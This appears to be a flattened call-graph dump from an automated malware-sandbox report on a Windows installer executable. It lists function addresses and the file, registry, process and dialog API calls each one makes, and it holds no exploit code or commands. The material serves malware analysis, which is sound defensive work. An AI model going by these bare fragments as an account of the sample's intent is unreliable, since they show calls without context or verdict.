405e4f 3154->3158 3156 401779 3157 405e4f 2 API calls 3156->3157 3157->3156 3159 405e5a GetTickCount GetTempFileNameA 3158->3159 3160 405e8b 3159->3160 3161 405e87 3159->3161 3160->3156 3161->3159 3161->3160 3921 40196c 3922 402c5e 21 API calls 3921->3922 3923 401973 lstrlenA 3922->3923 3924 40264d 3923->3924 3925 401ff0 3926 402c5e 21 API calls 3925->3926 3927 401ff7 3926->3927 3928 406620 2 API calls 3927->3928 3929 401ffd 3928->3929 3931 40200f 3929->3931 3932 4061eb wsprintfA 3929->3932 3932->3931 3933 4014f4 SetForegroundWindow 3934 402aea 3933->3934 3935 404778 3936 404788 3935->3936 3937 4047ae 3935->3937 3939 40432d 22 API calls 3936->3939 3938 404394 8 API calls 3937->3938 3941 4047ba 3938->3941 3940 404795 SetDlgItemTextA 3939->3940 3940->3937 3737 40177e 3738 402c5e 21 API calls 3737->3738 3739 401785 3738->3739 3740 4017a3 3739->3740 3741 4017ab 3739->3741 3776 40628d lstrcpynA 3740->3776 3777 40628d lstrcpynA 3741->3777 3744 4017b6 3746 405c1f 3 API calls 3744->3746 3745 4017a9 3748 406587 5 API calls 3745->3748 3747 4017bc lstrcatA 3746->3747 3747->3745 3770 4017c8 3748->3770 3749 406620 2 API calls 3749->3770 3751 405dfb 2 API calls 3751->3770 3752 4017df CompareFileTime 3752->3770 3753 4018a3 3755 4053d1 28 API calls 3753->3755 3754 40187a 3756 4053d1 28 API calls 3754->3756 3764 40188f 3754->3764 3757 4018ad 3755->3757 3756->3764 3758 403168 35 API calls 3757->3758 3760 4018c0 3758->3760 3759 40628d lstrcpynA 3759->3770 3761 4018d4 SetFileTime 3760->3761 3763 4018e6 CloseHandle 3760->3763 3761->3763 3762 406320 21 API calls 3762->3770 3763->3764 3765 4018f7 3763->3765 3766 4018fc 3765->3766 3767 40190f 3765->3767 3768 406320 21 API calls 3766->3768 3769 406320 21 API calls 3767->3769 3771 401904 lstrcatA 3768->3771 3772 401917 3769->3772 3770->3749 3770->3751 3770->3752 3770->3753 3770->3754 3770->3759 3770->3762 3773 4059a3 MessageBoxIndirectA 3770->3773 3775 405e20 GetFileAttributesA CreateFileA 3770->3775 3771->3772 3774 4059a3 MessageBoxIndirectA 3772->3774 3773->3770 3774->3764 3775->3770 3776->3745 3777->3744 3942 40167e 3943 402c5e 21 API calls 3942->3943 3944 401684 3943->3944 3945 406620 2 API calls 3944->3945 3946 40168a 3945->3946 3947 40197e 3948 402c3c 21 API calls 3947->3948 3949 401985 3948->3949 3950 402c3c 21 API calls 3949->3950 3951 401992 3950->3951 3952 402c5e 21 API calls 3951->3952 3953 4019a9 lstrlenA 3952->3953 3954 4019b9 3953->3954 3955 4019f9 3954->3955 3959 40628d lstrcpynA 3954->3959 3957 4019e9 3957->3955 3958 4019ee lstrlenA 3957->3958 3958->3955 3959->3957 3960 401000 3961 401037 BeginPaint GetClientRect 3960->3961 3962 40100c DefWindowProcA 3960->3962 3964 4010f3 3961->3964 3965 401179 3962->3965 3966 401073 CreateBrushIndirect FillRect DeleteObject 3964->3966 3967 4010fc 3964->3967 3966->3964 3968 401102 CreateFontIndirectA 3967->3968 3969 401167 EndPaint 3967->3969 3968->3969 3970 401112 6 API calls 3968->3970 3969->3965 3970->3969 3971 401502 3972 401507 3971->3972 3974 40152d 3971->3974 3973 402c3c 21 API calls 3972->3973 3973->3974 3975 401a83 3976 402c3c 21 API calls 3975->3976 3977 401a8c 3976->3977 3978 402c3c 21 API calls 3977->3978 3979 401a33 3978->3979 3980 401588 3981 402a67 3980->3981 3984 4061eb wsprintfA 3981->3984 3983 402a6c 3984->3983 3985 401b88 3986 402c5e 21 API calls 3985->3986 3987 401b8f 3986->3987 3988 402c3c 21 API calls 3987->3988 3989 401b98 wsprintfA 3988->3989 3990 402aea 3989->3990 3991 401d8a 3992 401d90 3991->3992 3993 401d9d GetDlgItem 3991->3993 3994 402c3c 21 API calls 3992->3994 3995 401d97 3993->3995 3994->3995 3996 401dde GetClientRect LoadImageA SendMessageA 3995->3996 3997 402c5e 21 API calls 3995->3997 3999 401e3f 3996->3999 4001 401e4b 3996->4001 3997->3996 4000 401e44 DeleteObject 3999->4000 3999->4001 4000->4001 4002 40278b 4003 402791 4002->4003 4004 402799 FindClose 4003->4004 4005 402aea 4003->4005 4004->4005 3162 40240d 3163 402c5e 21 API calls 3162->3163 3164 40241e 3163->3164 3165 402c5e 21 API calls 3164->3165 3166 402427 3165->3166 3167 402c5e 21 API calls 3166->3167 3168 402431 GetPrivateProfileStringA 3167->3168 4006 40280d 4007 402c5e 21 API calls 4006->4007 4008 402819 4007->4008 4009 40282f 4008->4009 4010 402c5e 21 API calls 4008->4010 4011 405dfb 2 API calls 4009->4011 4010->4009 4012 402835 4011->4012 4034 405e20 GetFileAttributesA CreateFileA 4012->4034 4014 402842 4015 4028fe 4014->4015 4016 4028e6 4014->4016 4017 40285d GlobalAlloc 4014->4017 4018 402905 DeleteFileA 4015->4018 4019 402918 4015->4019 4021 403168 35 API calls 4016->4021 4017->4016 4020 402876 4017->4020 4018->4019 4035 403390 SetFilePointer 4020->4035 4023 4028f3 CloseHandle 4021->4023 4023->4015 4024 40287c 4025 40337a ReadFile 4024->4025 4026 402885 GlobalAlloc 4025->4026 4027 402895 4026->4027 4028 4028cf 4026->4028 4029 403168 35 API calls 4027->4029 4030 405ec7 WriteFile 4028->4030 4033 4028a2 4029->4033 4031 4028db GlobalFree 4030->4031 4031->4016 4032 4028c6 GlobalFree 4032->4028 4033->4032 4034->4014 4035->4024 3169 40550f 3170 405531 GetDlgItem GetDlgItem GetDlgItem 3169->3170 3171 4056ba 3169->3171 3214 404362 SendMessageA 3170->3214 3173 4056c2 GetDlgItem CreateThread CloseHandle 3171->3173 3174 4056ea 3171->3174 3173->3174 3237 4054a3 OleInitialize 3173->3237 3176 405718 3174->3176 3177 405700 ShowWindow ShowWindow 3174->3177 3178 405739 3174->3178 3175 4055a1 3184 4055a8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3175->3184 3179 405773 3176->3179 3181 405728 3176->3181 3182 40574c ShowWindow 3176->3182 3219 404362 SendMessageA 3177->3219 3223 404394 3178->3223 3179->3178 3185 405780 SendMessageA 3179->3185 3220 404306 3181->3220 3188 40576c 3182->3188 3189 40575e 3182->3189 3190 405616 3184->3190 3191 4055fa SendMessageA SendMessageA 3184->3191 3187 405745 3185->3187 3192 405799 CreatePopupMenu 3185->3192 3196 404306 SendMessageA 3188->3196 3195 4053d1 28 API calls 3189->3195 3193 405629 3190->3193 3194 40561b SendMessageA 3190->3194 3191->3190 3197 406320 21 API calls 3192->3197 3215 40432d 3193->3215 3194->3193 3195->3188 3196->3179 3199 4057a9 AppendMenuA 3197->3199 3201 4057c7 GetWindowRect 3199->3201 3202 4057da TrackPopupMenu 3199->3202 3200 405639 3203 405642 ShowWindow 3200->3203 3204 405676 GetDlgItem SendMessageA 3200->3204 3201->3202 3202->3187 3205 4057f6 3202->3205 3206 405665 3203->3206 3207 405658 ShowWindow 3203->3207 3204->3187 3208 40569d SendMessageA SendMessageA 3204->3208 3209 405815 SendMessageA 3205->3209 3218 404362 SendMessageA 3206->3218 3207->3206 3208->3187 3209->3209 3210 405832 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3209->3210 3212 405854 SendMessageA 3210->3212 3212->3212 3213 405876 GlobalUnlock SetClipboardData CloseClipboard 3212->3213 3213->3187 3214->3175 3216 406320 21 API calls 3215->3216 3217 404338 SetDlgItemTextA 3216->3217 3217->3200 3218->3204 3219->3176 3221 404313 SendMessageA 3220->3221 3222 40430d 3220->3222 3221->3178 3222->3221 3224 404457 3223->3224 3225 4043ac GetWindowLongA 3223->3225 3224->3187 3225->3224 3226 4043c1 3225->3226 3226->3224 3227 4043f1 3226->3227 3228 4043ee GetSysColor 3226->3228 3229 404401 SetBkMode 3227->3229 3230 4043f7 SetTextColor 3227->3230 3228->3227 3231 404419 GetSysColor 3229->3231 3232 40441f 3229->3232 3230->3229 3231->3232 3233 404430 3232->3233 3234 404426 SetBkColor 3232->3234 3233->3224 3235 404443 DeleteObject 3233->3235 3236 40444a CreateBrushIndirect 3233->3236 3234->3233 3235->3236 3236->3224 3244 404379 3237->3244 3239 4054ed 3240 404379 SendMessageA 3239->3240 3242 4054ff OleUninitialize 3240->3242 3241 4054c6 3241->3239 3247 401389 3241->3247 3245 404391 3244->3245 3246 404382 SendMessageA 3244->3246 3245->3241 3246->3245 3249 401390 3247->3249 3248 4013fe 3248->3241 3249->3248 3250 4013cb MulDiv SendMessageA 3249->3250 3250->3249 3251 40168f 3252 402c5e 21 API calls 3251->3252 3253 401696 3252->3253 3254 402c5e 21 API calls 3253->3254 3255 40169f 3254->3255 3256 402c5e 21 API calls 3255->3256 3257 4016a8 MoveFileA 3256->3257 3258 4016b4 3257->3258 3259 4016bb 3257->3259 3261 401423 28 API calls 3258->3261 3263 40230f 3259->3263 3265 406620 FindFirstFileA 3259->3265 3261->3263 3266 406636 FindClose 3265->3266 3267 4016ca 3265->3267 3266->3267 3267->3263 3268 406066 MoveFileExA 3267->3268 3269 406087 3268->3269 3270 40607a 3268->3270 3269->3258 3272 405ef6 3270->3272 3273 405f42 GetShortPathNameA 3272->3273 3274 405f1c 3272->3274 3276 406061 3273->3276 3277 405f57 3273->3277 3299 405e20 GetFileAttributesA CreateFileA 3274->3299 3276->3269 3277->3276 3279 405f5f wsprintfA 3277->3279 3278 405f26 CloseHandle GetShortPathNameA 3278->3276 3280 405f3a 3278->3280 3281 406320 21 API calls 3279->3281 3280->3273 3280->3276 3282 405f87 3281->3282 3300 405e20 GetFileAttributesA CreateFileA 3282->3300 3284 405f94 3284->3276 3285 405fa3 GetFileSize GlobalAlloc 3284->3285 3286 405fc5 3285->3286 3287 40605a CloseHandle 3285->3287 3288 405e98 ReadFile 3286->3288 3287->3276 3289 405fcd 3288->3289 3289->3287 3301 405d85 lstrlenA 3289->3301 3292 405fe4 lstrcpyA 3295 406006 3292->3295 3293 405ff8 3294 405d85 4 API calls 3293->3294 3294->3295 3296 40603d SetFilePointer 3295->3296 3297 405ec7 WriteFile 3296->3297 3298 406053 GlobalFree 3297->3298 3298->3287 3299->3278 3300->3284 3302 405dc6 lstrlenA 3301->3302 3303 405dce 3302->3303 3304 405d9f lstrcmpiA 3302->3304 3303->3292 3303->3293 3304->3303 3305 405dbd CharNextA 3304->3305 3305->3302 4036 404b10 4037 404b20 4036->4037 4038 404b3c 4036->4038 4047 405987 GetDlgItemTextA 4037->4047 4039 404b42 SHGetPathFromIDListA 4038->4039 4040 404b6f 4038->4040 4042 404b52 4039->4042 4046 404b59 SendMessageA 4039->4046 4044 40140b 2 API calls 4042->4044 4043 404b2d SendMessageA 4043->4038 4044->4046 4046->4040 4047->4043 4048 401490 4049 4053d1 28 API calls 4048->4049 4050 401497 4049->4050 4051 401a12 4052 402c5e 21 API calls 4051->4052 4053 401a19 4052->4053 4054 402c5e 21 API calls 4053->4054 4055 401a22 4054->4055 4056 401a29 lstrcmpiA 4055->4056 4057 401a3b lstrcmpA 4055->4057 4058 401a2f 4056->4058 4057->4058 3410 401594 3411 4015a4 ShowWindow 3410->3411 3412 4015ab 3410->3412 3411->3412 3413 4015b9 ShowWindow 3412->3413 3414 402aea 3412->3414 3413->3414 4059 402318 4060 402c5e 21 API calls 4059->4060 4061 40231e 4060->4061 4062 402c5e 21 API calls 4061->4062 4063 402327 4062->4063 4064 402c5e 21 API calls 4063->4064 4065 402330 4064->4065 4066 406620 2 API calls 4065->4066 4067 402339 4066->4067 4068 40234a lstrlenA lstrlenA 4067->4068 4069 40233d 4067->4069 4071 4053d1 28 API calls 4068->4071 4070 4053d1 28 API calls 4069->4070 4073 402345 4069->4073 4070->4073 4072 402386 SHFileOperationA 4071->4072 4072->4069 4072->4073 4074 404498 4076 4045ba 4074->4076 4077 4044ae 4074->4077 4075 404629 4078 4046f3 4075->4078 4080 404633 GetDlgItem 4075->4080 4076->4075 4076->4078 4084 4045fe GetDlgItem SendMessageA 4076->4084 4079 40432d 22 API calls 4077->4079 4086 404394 8 API calls 4078->4086 4081 404504 4079->4081 4082 4046b1 4080->4082 4083 404649 4080->4083 4085 40432d 22 API calls 4081->4085 4082->4078 4087 4046c3 4082->4087 4083->4082 4091 40466f SendMessageA LoadCursorA SetCursor 4083->4091 4107 40434f KiUserCallbackDispatcher 4084->4107 4089 404511 CheckDlgButton 4085->4089 4090 4046ee 4086->4090 4092 4046c9 SendMessageA 4087->4092 4093 4046da 4087->4093 4105 40434f KiUserCallbackDispatcher 4089->4105 4111 40473c 4091->4111 4092->4093 4093->4090 4097 4046e0 SendMessageA 4093->4097 4094 404624 4108 404718 4094->4108 4097->4090 4099 40452f GetDlgItem 4106 404362 SendMessageA 4099->4106 4102 404545 SendMessageA 4103 404563 GetSysColor 4102->4103 4104 40456c SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4102->4104 4103->4104 4104->4090 4105->4099 4106->4102 4107->4094 4109 404726 4108->4109 4110 40472b SendMessageA 4108->4110 4109->4110 4110->4075 4114 405969 ShellExecuteExA 4111->4114 4113 4046a2 LoadCursorA SetCursor 4113->4082 4114->4113 4115 402198 4116 402c5e 21 API calls 4115->4116 4117 40219f 4116->4117 4118 402c5e 21 API calls 4117->4118 4119 4021a9 4118->4119 4120 402c5e 21 API calls 4119->4120 4121 4021b3 4120->4121 4122 402c5e 21 API calls 4121->4122 4123 4021c0 4122->4123 4124 402c5e 21 API calls 4123->4124 4125 4021ca 4124->4125 4126 40220c CoCreateInstance 4125->4126 4127 402c5e 21 API calls 4125->4127 4130 40222b 4126->4130 4132 4022d9 4126->4132 4127->4126 4128 401423 28 API calls 4129 40230f 4128->4129 4131 4022b9 MultiByteToWideChar 4130->4131 4130->4132 4131->4132 4132->4128 4132->4129 4133 40239a 4134 4023a1 4133->4134 4137 4023b4 4133->4137 4135 406320 21 API calls 4134->4135 4136 4023ae 4135->4136 4138 4059a3 MessageBoxIndirectA 4136->4138 4138->4137 4139 40269a 4140 402c3c 21 API calls 4139->4140 4145 4026a4 4140->4145 4141 402712 4142 405e98 ReadFile 4142->4145 4143 402714 4148 4061eb wsprintfA 4143->4148 4144 402724 4144->4141 4147 40273a SetFilePointer 4144->4147 4145->4141 4145->4142 4145->4143 4145->4144 4147->4141 4148->4141 4149 402a1b 4150 402a22 4149->4150 4151 402a6e 4149->4151 4153 402c3c 21 API calls 4150->4153 4156 402a6c 4150->4156 4152 4066b5 5 API calls 4151->4152 4154 402a75 4152->4154 4155 402a30 4153->4155 4157 402c5e 21 API calls 4154->4157 4158 402c3c 21 API calls 4155->4158 4159 402a7e 4157->4159 4161 402a3f 4158->4161 4159->4156 4167 4062e0 4159->4167 4166 4061eb wsprintfA 4161->4166 4162 402a8c 4162->4156 4171 4062ca 4162->4171 4166->4156 4168 4062eb 4167->4168 4169 40630e IIDFromString 4168->4169 4170 406307 4168->4170 4169->4162 4170->4162 4174 4062af WideCharToMultiByte 4171->4174 4173 402aad CoTaskMemFree 4173->4156 4174->4173 4175 40149d 4176 4023b4 4175->4176 4177 4014ab PostQuitMessage 4175->4177 4177->4176 4178 401f1e 4179 402c5e 21 API calls 4178->4179 4180 401f24 4179->4180 4181 402c5e 21 API calls 4180->4181 4182 401f2d 4181->4182 4183 402c5e 21 API calls 4182->4183 4184 401f36 4183->4184 4185 402c5e 21 API calls 4184->4185 4186 401f3f 4185->4186 4187 401423 28 API calls 4186->4187 4188 401f46 4187->4188 4195 405969 ShellExecuteExA 4188->4195 4190 401f81 4191 40672a 5 API calls 4190->4191 4192 4027ed 4190->4192 4193 401f9b CloseHandle 4191->4193 4193->4192 4195->4190 3006 401fa0 3007 402c5e 21 API calls 3006->3007 3008 401fa6 3007->3008 3009 4053d1 28 API calls 3008->3009 3010 401fb0 3009->3010 3021 405926 CreateProcessA 3010->3021 3013 401fd7 CloseHandle 3017 4027ed 3013->3017 3016 401fcb 3018 401fd0 3016->3018 3019 401fd9 3016->3019 3029 4061eb wsprintfA 3018->3029 3019->3013 3022 401fb6 3021->3022 3023 405959 CloseHandle 3021->3023 3022->3013 3022->3017 3024 40672a WaitForSingleObject 3022->3024 3023->3022 3025 406744 3024->3025 3026 406756 GetExitCodeProcess 3025->3026 3030 4066f1 3025->3030 3026->3016 3029->3013 3031 40670e PeekMessageA 3030->3031 3032 406704 DispatchMessageA 3031->3032 3033 40671e WaitForSingleObject 3031->3033 3032->3031 3033->3025 4196 402020 4197 402c5e 21 API calls 4196->4197 4198 402027 4197->4198 4199 4066b5 5 API calls 4198->4199 4200 402036 4199->4200 4201 4020be 4200->4201 4202 40204e GlobalAlloc 4200->4202 4202->4201 4203 402062 4202->4203 4204 4066b5 5 API calls 4203->4204 4205 402069 4204->4205 4206 4066b5 5 API calls 4205->4206 4207 402073 4206->4207 4207->4201 4211 4061eb wsprintfA 4207->4211 4209 4020ae 4212 4061eb wsprintfA 4209->4212 4211->4209 4212->4201 4213 401922 4214 401959 4213->4214 4215 402c5e 21 API calls 4214->4215 4216 40195e 4215->4216 4217 405a4f 71 API calls 4216->4217 4218 401967 4217->4218 3055 4024a3 3056 402c5e 21 API calls 3055->3056 3057 4024b5 3056->3057 3058 402c5e 21 API calls 3057->3058 3059 4024bf 3058->3059 3072 402cee 3059->3072 3062 402aea 3063 4024f4 3065 402500 3063->3065 3076 402c3c 3063->3076 3064 402c5e 21 API calls 3067 4024ed lstrlenA 3064->3067 3066 402522 RegSetValueExA 3065->3066 3079 403168 3065->3079 3070 402538 RegCloseKey 3066->3070 3067->3063 3070->3062 3073 402d09 3072->3073 3099 406141 3073->3099 3077 406320 21 API calls 3076->3077 3078 402c51 3077->3078 3078->3065 3080 40317e 3079->3080 3081 4031ac 3080->3081 3108 403390 SetFilePointer 3080->3108 3103 40337a 3081->3103 3085 403313 3087 403355 3085->3087 3093 403317 3085->3093 3086 4031c9 GetTickCount 3088 403218 3086->3088 3091 4032fd 3086->3091 3090 40337a ReadFile 3087->3090 3089 40337a ReadFile 3088->3089 3088->3091 3095 40326e GetTickCount 3088->3095 3096 403293 MulDiv wsprintfA 3088->3096 3106 405ec7 WriteFile 3088->3106 3089->3088 3090->3091 3091->3066 3092 40337a ReadFile 3092->3093 3093->3091 3093->3092 3094 405ec7 WriteFile 3093->3094 3094->3093 3095->3088 3097 4053d1 28 API calls 3096->3097 3097->3088 3100 406150 3099->3100 3101 4024cf 3100->3101 3102 40615b RegCreateKeyExA 3100->3102 3101->3062 3101->3063 3101->3064 3102->3101 3109 405e98 ReadFile 3103->3109 3107 405ee5 3106->3107 3107->3088 3108->3081 3110 4031b7 3109->3110 3110->3085 3110->3086 3110->3091 4219 401d23 4220 402c3c 21 API calls 4219->4220 4221 401d29 IsWindow 4220->4221 4222 401a33 4221->4222 4223 401925 4224 402c5e 21 API calls 4223->4224 4225 40192c 4224->4225 4226 4059a3 MessageBoxIndirectA 4225->4226 4227 401935 4226->4227 4228 4027a5 4229 4027ab 4228->4229 4230 4027af FindNextFileA 4229->4230 4231 4027c1 4229->4231 4230->4231 4232 402800 4230->4232 4234 40628d lstrcpynA 4232->4234 4234->4231 4235 401bac 4236 401bb9 4235->4236 4237 401bfd 4235->4237 4238 401c41 4236->4238 4243 401bd0 4236->4243 4239 401c01 4237->4239 4240 401c26 GlobalAlloc 4237->4240 4241 406320 21 API calls 4238->4241 4250 4023b4 4238->4250 4239->4250 4256 40628d lstrcpynA 4239->4256 4242 406320 21 API calls 4240->4242 4244 4023ae 4241->4244 4242->4238 4254 40628d lstrcpynA 4243->4254 4249 4059a3 MessageBoxIndirectA 4244->4249 4247 401c13 GlobalFree 4247->4250 4248 401bdf 4255 40628d lstrcpynA 4248->4255 4249->4250 4252 401bee 4257 40628d lstrcpynA 4252->4257 4254->4248 4255->4252 4256->4247 4257->4250 4258 4029af 4259 402c3c 21 API calls 4258->4259 4262 4029b5 4259->4262 4260 406320 21 API calls 4261 4027ed 4260->4261 4262->4260 4262->4261 4263 402631 4264 402c5e 21 API calls 4263->4264 4265 402638 4264->4265 4268 405e20 GetFileAttributesA CreateFileA 4265->4268 4267 402644 4268->4267 4269 404d32 GetDlgItem GetDlgItem 4270 404d88 7 API calls 4269->4270 4281 404faf 4269->4281 4271 404e30 DeleteObject 4270->4271 4272 404e24 SendMessageA 4270->4272 4273 404e3b 4271->4273 4272->4271 4274 404e72 4273->4274 4276 406320 21 API calls 4273->4276 4277 40432d 22 API calls 4274->4277 4275 405091 4278 40513d 4275->4278 4284 404fa2 4275->4284 4289 4050ea SendMessageA 4275->4289 4282 404e54 SendMessageA SendMessageA 4276->4282 4283 404e86 4277->4283 4279 405147 SendMessageA 4278->4279 4280 40514f 4278->4280 4279->4280 4291 405161 ImageList_Destroy 4280->4291 4292 405168 4280->4292 4300 405178 4280->4300 4281->4275 4287 404c80 5 API calls 4281->4287 4303 40501e 4281->4303 4282->4273 4288 40432d 22 API calls 4283->4288 4286 404394 8 API calls 4284->4286 4285 405083 SendMessageA 4285->4275 4290 40533e 4286->4290 4287->4303 4304 404e97 4288->4304 4289->4284 4294 4050ff SendMessageA 4289->4294 4291->4292 4295 405171 GlobalFree 4292->4295 4292->4300 4293 4052f2 4293->4284 4298 405304 ShowWindow GetDlgItem ShowWindow 4293->4298 4297 405112 4294->4297 4295->4300 4296 404f71 GetWindowLongA SetWindowLongA 4299 404f8a 4296->4299 4310 405123 SendMessageA 4297->4310 4298->4284 4301 404fa7 4299->4301 4302 404f8f ShowWindow 4299->4302 4300->4293 4313 404d00 4 API calls 4300->4313 4314 4051b3 4300->4314 4322 404362 SendMessageA 4301->4322 4321 404362 SendMessageA 4302->4321 4303->4275 4303->4285 4304->4296 4305 404f6c 4304->4305 4309 404ee9 SendMessageA 4304->4309 4311 404f27 SendMessageA 4304->4311 4312 404f3b SendMessageA 4304->4312 4305->4296 4305->4299 4306 4051f7 4315 4052bd 4306->4315 4319 40526b SendMessageA SendMessageA 4306->4319 4309->4304 4310->4278 4311->4304 4312->4304 4313->4314 4314->4306 4317 4051e1 SendMessageA 4314->4317 4316 4052c8 InvalidateRect 4315->4316 4318 4052d4 4315->4318 4316->4318 4317->4306 4318->4293 4323 404c3b 4318->4323 4319->4306 4321->4284 4322->4281 4326 404b76 4323->4326 4325 404c50 4325->4293 4327 404b8c 4326->4327 4328 406320 21 API calls 4327->4328 4329 404bf0 4328->4329 4330 406320 21 API calls 4329->4330 4331 404bfb 4330->4331 4332 406320 21 API calls 4331->4332 4333 404c11 lstrlenA wsprintfA SetDlgItemTextA 4332->4333 4333->4325 3328 403e33 3329 403e4b 3328->3329 3330 403fac 3328->3330 3329->3330 3331 403e57 3329->3331 3332 403ffd 3330->3332 3333 403fbd GetDlgItem GetDlgItem 3330->3333 3334 403e62 SetWindowPos 3331->3334 3335 403e75 3331->3335 3337 404057 3332->3337 3347 401389 2 API calls 3332->3347 3336 40432d 22 API calls 3333->3336 3334->3335 3339 403ec0 3335->3339 3340 403e7e ShowWindow 3335->3340 3341 403fe7 SetClassLongA 3336->3341 3338 404379 SendMessageA 3337->3338 3354 403fa7 3337->3354 3370 404069 3338->3370 3344 403ec8 DestroyWindow 3339->3344 3345 403edf 3339->3345 3342 403f99 3340->3342 3343 403e9e GetWindowLongA 3340->3343 3346 40140b 2 API calls 3341->3346 3348 404394 8 API calls 3342->3348 3343->3342 3349 403eb7 ShowWindow 3343->3349 3400 4042b6 3344->3400 3350 403ee4 SetWindowLongA 3345->3350 3351 403ef5 3345->3351 3346->3332 3352 40402f 3347->3352 3348->3354 3349->3339 3350->3354 3351->3342 3357 403f01 GetDlgItem 3351->3357 3352->3337 3353 404033 SendMessageA 3352->3353 3353->3354 3355 40140b 2 API calls 3355->3370 3356 4042b8 DestroyWindow KiUserCallbackDispatcher 3356->3400 3359 403f12 SendMessageA IsWindowEnabled 3357->3359 3360 403f2f 3357->3360 3358 4042e7 ShowWindow 3358->3354 3359->3354 3359->3360 3362 403f3c 3360->3362 3363 403f83 SendMessageA 3360->3363 3364 403f4f 3360->3364 3373 403f34 3360->3373 3361 406320 21 API calls 3361->3370 3362->3363 3362->3373 3363->3342 3367 403f57 3364->3367 3368 403f6c 3364->3368 3365 404306 SendMessageA 3369 403f6a 3365->3369 3366 40432d 22 API calls 3366->3370 3407 40140b 3367->3407 3372 40140b 2 API calls 3368->3372 3369->3342 3370->3354 3370->3355 3370->3356 3370->3361 3370->3366 3375 40432d 22 API calls 3370->3375 3391 4041f8 DestroyWindow 3370->3391 3374 403f73 3372->3374 3373->3365 3374->3342 3374->3373 3376 4040e4 GetDlgItem 3375->3376 3377 404101 ShowWindow KiUserCallbackDispatcher 3376->3377 3378 4040f9 3376->3378 3401 40434f KiUserCallbackDispatcher 3377->3401 3378->3377 3380 40412b EnableWindow 3384 40413f 3380->3384 3381 404144 GetSystemMenu EnableMenuItem SendMessageA 3382 404174 SendMessageA 3381->3382 3381->3384 3382->3384 3384->3381 3402 404362 SendMessageA 3384->3402 3403 403e14 3384->3403 3406 40628d lstrcpynA 3384->3406 3387 4041a3 lstrlenA 3388 406320 21 API calls 3387->3388 3389 4041b4 SetWindowTextA 3388->3389 3390 401389 2 API calls 3389->3390 3390->3370 3392 404212 CreateDialogParamA 3391->3392 3391->3400 3393 404245 3392->3393 3392->3400 3394 40432d 22 API calls 3393->3394 3395 404250 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3394->3395 3396 401389 2 API calls 3395->3396 3397 404296 3396->3397 3397->3354 3398 40429e ShowWindow 3397->3398 3399 404379 SendMessageA 3398->3399 3399->3400 3400->3354 3400->3358 3401->3380 3402->3384 3404 406320 21 API calls 3403->3404 3405 403e22 SetWindowTextA 3404->3405 3405->3384 3406->3387 3408 401389 2 API calls 3407->3408 3409 401420 3408->3409 3409->3373 3415 4025b5 3416 402c9e 21 API calls 3415->3416 3417 4025bf 3416->3417 3418 402c3c 21 API calls 3417->3418 3419 4025c8 3418->3419 3420 4025d6 3419->3420 3425 4027ed 3419->3425 3421 4025e3 RegEnumKeyA 3420->3421 3422 4025ef RegEnumValueA 3420->3422 3423 40260b RegCloseKey 3421->3423 3422->3423 3424 402604 3422->3424 3423->3425 3424->3423 4334 4014b7 4335 4014bd 4334->4335 4336 401389 2 API calls 4335->4336 4337 4014c5 4336->4337 3726 4039bc 3727 4039d4 3726->3727 3728 4039c6 CloseHandle 3726->3728 3733 403a01 3727->3733 3728->3727 3731 405a4f 71 API calls 3732 4039e5 3731->3732 3734 403a0f 3733->3734 3735 4039d9 3734->3735 3736 403a14 FreeLibrary GlobalFree 3734->3736 3735->3731 3736->3735 3736->3736 4338 4047bf 4339 4047eb 4338->4339 4340 4047fc 4338->4340 4399 405987 GetDlgItemTextA 4339->4399 4342 404808 GetDlgItem 4340->4342 4347 404867 4340->4347 4344 40481c 4342->4344 4343 4047f6 4345 406587 5 API calls 4343->4345 4346 404830 SetWindowTextA 4344->4346 4350 405cb8 4 API calls 4344->4350 4345->4340 4351 40432d 22 API calls 4346->4351 4352 406320 21 API calls 4347->4352 4361 40494b 4347->4361 4397 404af5 4347->4397 4349 404394 8 API calls 4354 404b09 4349->4354 4355 404826 4350->4355 4356 40484c 4351->4356 4357 4048db SHBrowseForFolderA 4352->4357 4353 40497b 4358 405d0d 18 API calls 4353->4358 4355->4346 4365 405c1f 3 API calls 4355->4365 4359 40432d 22 API calls 4356->4359 4360 4048f3 CoTaskMemFree 4357->4360 4357->4361 4362 404981 4358->4362 4363 40485a 4359->4363 4364 405c1f 3 API calls 4360->4364 4361->4397 4401 405987 GetDlgItemTextA 4361->4401 4402 40628d lstrcpynA 4362->4402 4400 404362 SendMessageA 4363->4400 4367 404900 4364->4367 4365->4346 4370 404937 SetDlgItemTextA 4367->4370 4374 406320 21 API calls 4367->4374 4369 404860 4372 4066b5 5 API calls 4369->4372 4370->4361 4371 404998 4373 4066b5 5 API calls 4371->4373 4372->4347 4381 40499f 4373->4381 4375 40491f lstrcmpiA 4374->4375 4375->4370 4378 404930 lstrcatA 4375->4378 4376 4049db 4403 40628d lstrcpynA 4376->4403 4378->4370 4379 4049e2 4380 405cb8 4 API calls 4379->4380 4382 4049e8 GetDiskFreeSpaceA 4380->4382 4381->4376 4385 405c66 2 API calls 4381->4385 4387 404a33 4381->4387 4384 404a0c MulDiv 4382->4384 4382->4387 4384->4387 4385->4381 4386 404aa4 4389 404ac7 4386->4389 4391 40140b 2 API calls 4386->4391 4387->4386 4388 404c3b 24 API calls 4387->4388 4390 404a91 4388->4390 4404 40434f KiUserCallbackDispatcher 4389->4404 4393 404aa6 SetDlgItemTextA 4390->4393 4394 404a96 4390->4394 4391->4389 4393->4386 4396 404b76 24 API calls 4394->4396 4395 404ae3 4395->4397 4398 404718 SendMessageA 4395->4398 4396->4386 4397->4349 4398->4397 4399->4343 4400->4369 4401->4353 4402->4371 4403->4379 4404->4395

                                Executed Functions

                                Function 004033D8 Relevance: 98.4, APIs: 33, Strings: 23, Instructions: 430stringfilecomCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
